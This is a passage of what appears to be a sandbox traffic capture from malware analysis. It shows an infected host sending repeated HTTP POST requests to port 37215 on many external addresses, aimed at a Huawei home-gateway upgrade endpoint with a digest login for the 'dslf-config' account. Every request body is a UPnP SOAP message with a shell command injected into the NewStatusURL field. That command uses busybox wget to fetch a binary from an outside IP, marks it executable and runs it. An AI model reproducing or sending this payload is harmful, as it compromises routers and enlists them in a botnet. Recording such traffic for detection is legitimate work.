                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              838192.168.2.1556350190.87.217.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537966013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              839192.168.2.1558338197.110.21.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537987947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              840192.168.2.1556042181.61.74.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538014889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              841192.168.2.155883094.118.93.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538026094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              842192.168.2.1536572102.95.230.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538058043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              843192.168.2.153746694.99.32.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538062096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              844192.168.2.1534258156.115.149.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538089037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              845192.168.2.1550636156.87.43.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538103104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              846192.168.2.1556560197.39.58.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538144112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              847192.168.2.1556178222.64.143.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538145065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              848192.168.2.1544996190.24.170.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538161993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
